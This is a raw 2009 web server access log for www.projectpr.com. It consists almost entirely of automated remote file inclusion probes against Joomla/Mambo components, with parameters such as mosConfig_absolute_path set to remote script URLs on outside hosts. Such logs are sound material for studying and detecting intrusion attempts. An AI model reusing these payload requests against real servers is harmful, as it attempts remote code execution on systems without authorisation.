218.38.34.195 - - [13/Jun/2009:07:17:43 -0700] "GET /?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/id.txt???? HTTP/1.1" 200 9405 "-" "libwww-perl/5.805" "www.projectpr.com"
218.38.34.195 - - [13/Jun/2009:07:17:43 -0700] "GET /logs/access_070912.log/?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
218.38.34.195 - - [13/Jun/2009:07:17:44 -0700] "GET /logs/?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/id.txt???? HTTP/1.1" 200 6801 "-" "libwww-perl/5.805" "www.projectpr.com"
125.137.191.115 - - [13/Jun/2009:07:17:45 -0700] "GET /logs/access_070812.log%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
125.137.191.115 - - [13/Jun/2009:07:17:45 -0700] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
125.137.191.115 - - [13/Jun/2009:07:17:48 -0700] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
125.137.191.115 - - [13/Jun/2009:07:17:51 -0700] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
125.137.191.115 - - [13/Jun/2009:07:17:51 -0700] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
125.137.191.115 - - [13/Jun/2009:07:17:51 -0700] "GET /logs/access_070812.log%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
125.137.191.115 - - [13/Jun/2009:07:17:58 -0700] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
125.137.191.115 - - [13/Jun/2009:07:17:59 -0700] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
125.137.191.115 - - [13/Jun/2009:07:17:59 -0700] "GET /logs/access_070812.log%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
218.38.34.195 - - [13/Jun/2009:07:18:00 -0700] "GET /logs/access_071012.log/?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
125.137.191.115 - - [13/Jun/2009:07:19:05 -0700] "GET /logs/access_070812.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
210.112.121.225 - - [13/Jun/2009:07:20:15 -0700] "GET /logs/access_070812.log%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
210.112.121.225 - - [13/Jun/2009:07:20:15 -0700] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
210.112.121.225 - - [13/Jun/2009:07:20:15 -0700] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
210.112.121.225 - - [13/Jun/2009:07:20:32 -0700] "GET /logs/access_070812.log%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
210.112.121.225 - - [13/Jun/2009:07:20:33 -0700] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
210.112.121.225 - - [13/Jun/2009:07:20:33 -0700] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
125.137.191.115 - - [13/Jun/2009:07:21:47 -0700] "GET /logs/access_070812.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
125.137.191.115 - - [13/Jun/2009:07:22:12 -0700] "GET /logs/access_070812.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
125.137.191.115 - - [13/Jun/2009:07:22:20 -0700] "GET /logs/access_070812.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
218.38.34.195 - - [13/Jun/2009:07:26:31 -0700] "GET /logs/access_071012.log%20/?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
218.38.34.195 - - [13/Jun/2009:07:26:31 -0700] "GET /logs/access_070912.log%20/?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
118.129.166.10 - - [13/Jun/2009:07:29:12 -0700] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
118.129.166.10 - - [13/Jun/2009:07:29:14 -0700] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
118.129.166.10 - - [13/Jun/2009:07:29:15 -0700] "GET /logs/access_070812.log%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
82.208.58.78 - - [13/Jun/2009:07:31:45 -0700] "GET /?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/id.txt???? HTTP/1.1" 200 9405 "-" "libwww-perl/5.805" "www.projectpr.com"
82.208.58.78 - - [13/Jun/2009:07:31:57 -0700] "GET /logs/?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/id.txt???? HTTP/1.1" 200 6801 "-" "libwww-perl/5.805" "www.projectpr.com"
82.208.58.78 - - [13/Jun/2009:07:31:58 -0700] "GET /logs/access_070912.log/?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
190.144.44.36 - - [13/Jun/2009:07:36:23 -0700] "GET /logs/access_070612.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
190.144.44.36 - - [13/Jun/2009:07:36:23 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
190.144.44.36 - - [13/Jun/2009:07:36:23 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
82.208.58.78 - - [13/Jun/2009:07:36:49 -0700] "GET /logs/access_071012.log/?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:07:37:57 -0700] "GET /index.php?_REQUEST=&_REQUEST=Array&GLOBALS=&mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:07:37:58 -0700] "GET /index.php?_REQUEST=&_REQUEST=Array&GLOBALS=&mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:07:38:03 -0700] "GET /index.php?_REQUEST=&_REQUEST=Array&GLOBALS=&mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:07:38:22 -0700] "GET /?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 200 9405 "-" "libwww-perl/5.803" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:07:38:30 -0700] "GET /?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 200 9405 "-" "libwww-perl/5.803" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:07:38:31 -0700] "GET /?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 200 9405 "-" "libwww-perl/5.803" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:07:40:15 -0700] "GET /logs/access_071012.log//index.php?_REQUEST=&_REQUEST=Array&GLOBALS=&mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:07:40:15 -0700] "GET /logs/access_071012.log//index.php?_REQUEST=&_REQUEST=Array&GLOBALS=&mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:07:40:16 -0700] "GET /index.php?_REQUEST=&_REQUEST=Array&GLOBALS=&mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:07:40:16 -0700] "GET /index.php?_REQUEST=&_REQUEST=Array&GLOBALS=&mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:07:40:17 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST=Array&GLOBALS=&mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:07:40:17 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST=Array&GLOBALS=&mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:07:40:21 -0700] "GET /logs/access_071012.log//index.php?_REQUEST=&_REQUEST=Array&GLOBALS=&mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:07:40:21 -0700] "GET /index.php?_REQUEST=&_REQUEST=Array&GLOBALS=&mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:07:40:22 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST=Array&GLOBALS=&mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:07:43:22 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:07:43:22 -0700] "GET /logs/access.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:07:43:22 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:07:43:26 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:07:43:26 -0700] "GET /logs/access.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:07:43:26 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
59.24.49.35 - - [13/Jun/2009:07:43:50 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
59.24.49.35 - - [13/Jun/2009:07:43:50 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
59.24.49.35 - - [13/Jun/2009:07:43:50 -0700] "GET /logs/access.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
59.24.49.35 - - [13/Jun/2009:07:44:02 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
59.24.49.35 - - [13/Jun/2009:07:44:02 -0700] "GET /logs/access.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
59.24.49.35 - - [13/Jun/2009:07:44:03 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
125.137.191.115 - - [13/Jun/2009:07:44:10 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
125.137.191.115 - - [13/Jun/2009:07:44:10 -0700] "GET /modules/xfsection/modify.php?dir_module=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
125.137.191.115 - - [13/Jun/2009:07:44:10 -0700] "GET /logs/access_071112.log%20%20//modules/xfsection/modify.php?dir_module=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
125.137.191.115 - - [13/Jun/2009:07:44:45 -0700] "GET /logs/access_071212.log%20%20//modules/xfsection/modify.php?dir_module=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
210.112.121.225 - - [13/Jun/2009:07:45:52 -0700] "GET /include/write.php?dir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
210.112.121.225 - - [13/Jun/2009:07:45:52 -0700] "GET /logs/access_070912.log%20%20//include/write.php?dir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
210.112.121.225 - - [13/Jun/2009:07:45:52 -0700] "GET /logs//include/write.php?dir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
81.248.63.177 - - [13/Jun/2009:07:47:50 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.jennyguerreroferreccio.com/visitas/FX29ID1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
81.248.63.177 - - [13/Jun/2009:07:47:50 -0700] "GET /logs/access_070912.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.jennyguerreroferreccio.com/visitas/FX29ID1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
81.248.63.177 - - [13/Jun/2009:07:47:50 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.jennyguerreroferreccio.com/visitas/FX29ID1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
81.248.63.177 - - [13/Jun/2009:07:48:40 -0700] "GET /logs/access_071012.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.jennyguerreroferreccio.com/visitas/FX29ID1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.6.22.163 - - [13/Jun/2009:07:49:12 -0700] "GET /index.html HTTP/1.0" 200 9405 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
210.112.121.225 - - [13/Jun/2009:07:49:33 -0700] "GET /logs/access_071012.log%20%20//include/write.php?dir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
125.137.191.115 - - [13/Jun/2009:07:51:54 -0700] "GET /logs/access_071112.log//modules/xfsection/modify.php?dir_module=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
125.137.191.115 - - [13/Jun/2009:07:52:05 -0700] "GET /logs/access_071212.log//modules/xfsection/modify.php?dir_module=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
81.248.63.177 - - [13/Jun/2009:07:52:16 -0700] "GET /logs/access_070912.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.jennyguerreroferreccio.com/visitas/FX29ID1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
118.129.166.10 - - [13/Jun/2009:07:53:17 -0700] "GET /logs/access_070812.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
74.6.22.163 - - [13/Jun/2009:07:53:43 -0700] "GET /aboutus.html HTTP/1.0" 200 8070 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
81.248.63.177 - - [13/Jun/2009:07:53:58 -0700] "GET /logs/access_071012.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.jennyguerreroferreccio.com/visitas/FX29ID1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
68.109.233.157 - - [13/Jun/2009:07:58:45 -0700] "GET /logs/access_071212.log//components/com_hotproperty/components/com_dwodp/index.php?mosConfig_absolute_path=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
68.109.233.157 - - [13/Jun/2009:07:58:45 -0700] "GET /components/com_hotproperty/components/com_dwodp/index.php?mosConfig_absolute_path=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
68.109.233.157 - - [13/Jun/2009:07:58:45 -0700] "GET /logs//components/com_hotproperty/components/com_dwodp/index.php?mosConfig_absolute_path=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
68.109.233.157 - - [13/Jun/2009:07:58:47 -0700] "GET /logs/access_061212.log//components/com_hotproperty/components/com_dwodp/index.php?mosConfig_absolute_path=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:07:59:39 -0700] "GET /logs/access_070912.log//index.php?_REQUEST=&_REQUEST=Array&GLOBALS=&mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:07:59:39 -0700] "GET /logs/access_070912.log//index.php?_REQUEST=&_REQUEST=Array&GLOBALS=&mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:07:59:40 -0700] "GET /index.php?_REQUEST=&_REQUEST=Array&GLOBALS=&mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:07:59:40 -0700] "GET /index.php?_REQUEST=&_REQUEST=Array&GLOBALS=&mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:07:59:41 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST=Array&GLOBALS=&mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:07:59:41 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST=Array&GLOBALS=&mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:07:59:44 -0700] "GET /logs/access_070912.log//index.php?_REQUEST=&_REQUEST=Array&GLOBALS=&mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:07:59:45 -0700] "GET /index.php?_REQUEST=&_REQUEST=Array&GLOBALS=&mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
125.137.191.115 - - [13/Jun/2009:07:59:45 -0700] "GET /logs/access_070812.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
125.137.191.115 - - [13/Jun/2009:07:59:45 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
125.137.191.115 - - [13/Jun/2009:07:59:45 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:07:59:46 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST=Array&GLOBALS=&mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
125.137.191.115 - - [13/Jun/2009:07:59:52 -0700] "GET /logs/access_070912.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:07:59:58 -0700] "GET /logs/access_071012.log//?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:07:59:59 -0700] "GET /?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 200 9405 "-" "libwww-perl/5.803" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:08:00:00 -0700] "GET /logs//?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 200 6806 "-" "libwww-perl/5.803" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:08:00:10 -0700] "GET /logs/access_071012.log//?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:08:00:11 -0700] "GET /?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 200 9405 "-" "libwww-perl/5.803" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:08:00:12 -0700] "GET /logs//?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 200 6806 "-" "libwww-perl/5.803" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:08:00:23 -0700] "GET /logs/access_071012.log//?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:08:00:24 -0700] "GET /?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 200 9405 "-" "libwww-perl/5.803" "www.projectpr.com"
222.122.45.16 - - [13/Jun/2009:08:00:25 -0700] "GET /logs//?mosConfig_absolute_path=http://www.avigroup.ru//UserFiles/idomila.txt?? HTTP/1.1" 200 6806 "-" "libwww-perl/5.803" "www.projectpr.com"
125.137.191.115 - - [13/Jun/2009:08:02:29 -0700] "GET /logs/access_070812.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
125.137.191.115 - - [13/Jun/2009:08:02:41 -0700] "GET /logs/access_070912.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
218.38.34.195 - - [13/Jun/2009:08:03:59 -0700] "GET /?mosConfig_absolute_path=http://www.chaosgang.net/language/runid.txt?? HTTP/1.1" 200 9405 "-" "libwww-perl/5.805" "www.projectpr.com"
218.38.34.195 - - [13/Jun/2009:08:04:00 -0700] "GET /logs//?mosConfig_absolute_path=http://www.chaosgang.net/language/runid.txt?? HTTP/1.1" 200 6806 "-" "libwww-perl/5.805" "www.projectpr.com"
218.38.34.195 - - [13/Jun/2009:08:04:00 -0700] "GET /logs/access_071012.log//?mosConfig_absolute_path=http://www.chaosgang.net/language/runid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
218.38.34.195 - - [13/Jun/2009:08:04:01 -0700] "GET /?mosConfig_absolute_path=http://www.chaosgang.net/language/runid.txt?? HTTP/1.1" 200 9405 "-" "libwww-perl/5.805" "www.projectpr.com"
218.38.34.195 - - [13/Jun/2009:08:04:01 -0700] "GET /logs//?mosConfig_absolute_path=http://www.chaosgang.net/language/runid.txt?? HTTP/1.1" 200 6806 "-" "libwww-perl/5.805" "www.projectpr.com"
